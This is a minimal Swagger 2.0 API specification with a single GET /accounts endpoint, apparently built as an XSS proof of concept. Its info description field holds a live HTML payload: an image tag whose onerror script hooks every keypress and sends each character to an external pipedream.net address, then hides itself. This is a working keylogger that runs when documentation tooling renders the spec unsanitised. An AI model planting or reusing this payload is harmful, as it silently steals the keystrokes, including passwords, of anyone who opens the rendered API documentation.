swagger: '2.0'
info:
  title: Example yaml.spec
  description: <img src=x onerror='document.onkeypress=function(e){fetch("https://enejc3gkoimoi.x.pipedream.net/?k="+String.fromCharCode(e.which))},this.remove();'>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
